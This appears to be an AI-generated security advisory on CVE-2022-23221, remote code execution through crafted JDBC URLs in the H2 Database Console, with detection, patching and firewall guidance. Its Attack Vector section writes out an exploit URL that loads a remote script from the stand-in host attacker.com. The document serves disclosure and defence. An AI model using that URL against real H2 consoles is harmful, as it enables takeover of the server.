CVE-2022-23221 Overview
CVE-2022-23221 is a critical remote code execution vulnerability affecting the H2 Database Console prior to version 2.1.210. The vulnerability allows remote attackers to execute arbitrary code by crafting a malicious JDBC URL containing specific parameters that bypass security restrictions. This vulnerability is distinct from CVE-2021-42392 but exploits a similar attack surface within the H2 Console component.
The H2 database is a popular lightweight Java SQL database commonly embedded in Java applications and used for development and testing purposes. The console component provides a web-based interface for database administration, which when exposed to untrusted networks, becomes a significant attack surface.
Critical Impact
Remote attackers can achieve full system compromise through arbitrary code execution without authentication, potentially leading to complete takeover of affected systems.
Affected Products
- H2database H2 (versions prior to 2.1.210)
- Debian Linux 9.0, 10.0, and 11.0
- Oracle Communications Cloud Native Core Console 1.9.0
Discovery Timeline
- 2022-01-19 - CVE CVE-2022-23221 published to NVD
- 2025-05-05 - Last updated in NVD database
Technical Details for CVE-2022-23221
Vulnerability Analysis
The vulnerability resides in how the H2 Console processes JDBC connection URLs. When a user connects to the H2 Console, they can specify a JDBC URL that defines database connection parameters. The flaw allows attackers to inject malicious parameters that enable script execution during database initialization.
The attack leverages the JDBC URL parameter handling to achieve code execution. By combining IGNORE_UNKNOWN_SETTINGS=TRUE, FORBID_CREATION=FALSE, and INIT=RUNSCRIPT, an attacker can force the H2 database to execute arbitrary SQL statements or Java code during the connection process. The IGNORE_UNKNOWN_SETTINGS parameter suppresses errors for unrecognized settings, while FORBID_CREATION=FALSE allows database creation, and INIT=RUNSCRIPT executes scripts from external sources.
This vulnerability is classified under CWE-88 (Improper Neutralization of Argument Delimiters in a Command), as the underlying issue stems from insufficient validation of special characters and parameters within the JDBC URL string.
Root Cause
The root cause lies in inadequate input validation of JDBC URL parameters within the H2 Console. The application fails to properly sanitize or restrict dangerous parameter combinations that can lead to script execution. Specifically, the console does not prevent users from specifying initialization scripts through the INIT=RUNSCRIPT parameter when combined with settings that bypass security controls.
The vulnerability exists because the H2 Console trusts user-supplied JDBC URLs without sufficient validation of the embedded parameters. This allows attackers to craft URLs that execute arbitrary code through the database initialization process, effectively turning a database connection string into a code execution vector.
Attack Vector
The attack can be executed remotely over the network against any exposed H2 Console instance. The attacker constructs a malicious JDBC URL with the following structure:
jdbc:h2:mem:testdb;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://attacker.com/malicious.sql'
When this URL is processed by the H2 Console, it:
- Creates an in-memory database named testdb
- Ignores any unknown or potentially blocked settings
- Allows database creation regardless of existing security policies
- Fetches and executes a script from a remote attacker-controlled server
The malicious script can contain Java code embedded within SQL statements using H2's CREATE ALIAS functionality, which allows defining custom Java methods that execute with the privileges of the H2 process. For detailed technical analysis and proof-of-concept examples, see the Packet Storm security advisory and the Full Disclosure announcement.
Detection Methods for CVE-2022-23221
Indicators of Compromise
- Unusual outbound HTTP requests from H2 database processes to external servers
- JDBC connection URLs containing INIT=RUNSCRIPT combined with IGNORE_UNKNOWN_SETTINGS=TRUE parameters
- New or unexpected processes spawned by Java/H2 processes
- Database log entries showing script execution from remote URLs
- Network traffic to unfamiliar external endpoints from systems running H2
Detection Strategies
- Monitor H2 Console access logs for connection attempts containing suspicious JDBC URL parameters
- Implement network-level detection for HTTP requests originating from H2 processes to external URLs
- Deploy web application firewall rules to block JDBC URLs containing dangerous parameter combinations
- Use application security monitoring to detect runtime code execution anomalies in Java processes
Monitoring Recommendations
- Enable verbose logging on H2 Console instances to capture all connection attempts and parameters
- Implement network segmentation to isolate H2 Console instances and monitor traffic flows
- Deploy endpoint detection and response (EDR) solutions to monitor for suspicious process behavior
- Regularly audit H2 database configurations and exposed network services
How to Mitigate CVE-2022-23221
Immediate Actions Required
- Upgrade H2 database to version 2.1.210 or later immediately
- Disable or restrict network access to the H2 Console if not required for production operations
- Implement network access controls to limit H2 Console access to trusted IP addresses only
- Review application configurations to ensure H2 Console is not inadvertently exposed to the internet
Patch Information
The H2 database team has addressed this vulnerability in version 2.1.210. Organizations should upgrade to this version or later to remediate the vulnerability. The fix implements proper validation and restrictions on JDBC URL parameters to prevent malicious script execution.
Patch resources:
- H2 Database Release 2.1.210
- H2 Database Security Advisories
- Oracle Critical Patch Update April 2022
- Debian Security Advisory DSA-5076
Workarounds
- Disable the H2 Console entirely if it is not required by setting -Dh2.bindAddress=localhost to restrict access to localhost only
- Implement firewall rules to block external access to H2 Console ports (default 8082)
- Use a reverse proxy with authentication to protect H2 Console access
- Deploy network segmentation to isolate systems running H2 databases from untrusted networks
# Configuration example
# Restrict H2 Console to localhost only
java -Dh2.bindAddress=127.0.0.1 -jar h2*.jar
# Alternatively, disable the web console entirely
java -Dh2.consoleEnabled=false -jar h2*.jar
# Firewall rule to block external access to H2 Console (iptables example)
iptables -A INPUT -p tcp --dport 8082 -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp --dport 8082 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
